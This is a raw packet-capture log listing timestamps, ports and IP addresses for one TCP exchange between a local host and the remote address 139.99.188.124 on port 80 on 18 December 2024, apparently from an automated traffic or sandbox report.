                                                                              Dec 18, 2024 21:00:29.048614025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.051940918 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.052561045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.052572012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.052707911 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.057338953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.057351112 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.057562113 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.061844110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.063371897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.063750982 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.066930056 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.066941977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.067065954 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.071374893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.071706057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.074357033 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.079801083 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.080250978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.080312967 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.083297968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.084038973 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.084129095 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.088345051 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.088835955 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.088912964 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.093219042 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.093683004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.093884945 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.097863913 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.098227978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.098710060 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.102619886 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.103127003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.103281021 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.207118034 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.207542896 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.207767963 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.209033012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.209695101 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.209768057 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.212965965 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.213449955 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.213516951 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.216691971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.217279911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.217387915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.227591991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.228095055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.228142023 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.229300976 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.229901075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.229984045 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.232865095 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.233241081 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.233653069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.236316919 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.236617088 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.236836910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.239773989 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.240242004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.240372896 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.243179083 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.243633032 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.243740082 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.246700048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.247165918 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.247530937 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.250102997 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.250580072 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.250720024 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.253624916 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.254069090 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.254178047 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.257029057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.257461071 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.257603884 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.260663033 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.261271954 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.261344910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.263947010 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.264416933 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.264544010 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.267426968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.268021107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.268119097 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.270936966 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.271513939 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.271574020 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.273363113 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.273376942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.273585081 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.277831078 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.278294086 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.281383991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.281500101 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.281833887 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.282360077 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.284706116 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.285314083 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.285814047 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.288295031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.288743973 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.288829088 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.291687965 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.292376041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.292475939 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.295319080 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.295892000 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.295923948 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.298603058 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.299207926 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.299269915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.302212000 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.302654028 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.303706884 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.305769920 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.306160927 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.306210995 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.309045076 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.309181929 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.309473038 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.312623978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.313127041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.313208103 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.316040039 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.316724062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.316798925 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.319530964 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.319987059 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.320116997 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.322954893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.323393106 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.323438883 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.326441050 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.326879025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.326927900 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.329878092 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.330317020 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.330384970 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.333379030 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.333832026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.333898067 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.336850882 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.337410927 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.337475061 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.340424061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.340791941 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.340859890 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.343796015 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.344234943 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.344291925 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.344717979 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.345190048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.345339060 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.348222017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.348686934 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.350059986 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.351675034 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.352125883 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.352231026 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.355144024 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.355611086 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.355722904 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.396714926 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.397231102 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.397329092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.398329020 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.399004936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.399111986 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.401429892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.401906013 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.401968002 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.404694080 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.405167103 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.405291080 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.407733917 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.408225060 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.408480883 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.410803080 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.411262989 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.411458015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.413820028 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.414362907 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.414482117 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.416763067 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.417129993 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.417196035 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.417751074 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.419939995 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.420125961 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.420418024 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.422107935 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.422238111 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.422586918 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.425116062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.425162077 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.425570965 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.427942038 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.428432941 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.428503990 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.430891037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.430984020 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.431449890 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.433890104 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.433984995 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.434340000 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.436682940 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.436891079 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.437145948 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.439222097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.439444065 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.439702034 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.441627979 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.441690922 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.442086935 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.444137096 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.444205046 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.444528103 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.446513891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.446908951 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.446970940 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.448972940 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.449067116 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.449568033 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.451976061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.452048063 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.452538013 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.454929113 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.455018997 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.455446005 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.457969904 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.458067894 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.458575964 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.460624933 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.460724115 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.461241007 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.463077068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.463288069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.463512897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.465238094 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.465353966 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.465641975 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.466509104 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.466561079 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.467236996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.467892885 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.468024015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.468645096 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.469613075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.469624996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.469693899 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.471110106 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.471122026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.471214056 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.472812891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.472825050 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.473383904 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.474469900 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.474483013 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.474539042 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.476042032 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.476053953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.476175070 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.477833986 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.477844954 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.477894068 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.479609966 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.479629040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.479669094 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.481425047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.481451988 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.481544018 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.483526945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.483539104 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.483831882 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.485557079 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.485599995 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.485600948 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.487914085 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.487926006 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.487935066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.487968922 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.488203049 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.490032911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.490046978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.490094900 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.491921902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.491936922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.492216110 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.493706942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.493720055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.493766069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.495779991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.495795012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.495805025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.495956898 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.497816086 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.497829914 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.497975111 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.499897003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.499908924 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.500020981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.501948118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.501964092 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.502008915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.504180908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.504215002 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.504316092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.506215096 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.506227016 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.506236076 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.506361008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.506361008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.508347988 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.508362055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.508433104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.510492086 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.510531902 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.510572910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.512711048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.512736082 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.512887955 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.514947891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.514961004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.514972925 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.515053988 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.516689062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.516705036 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.516844988 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.578799009 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.588809967 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.589232922 CET8049744139.99.188.124192.168.2.4
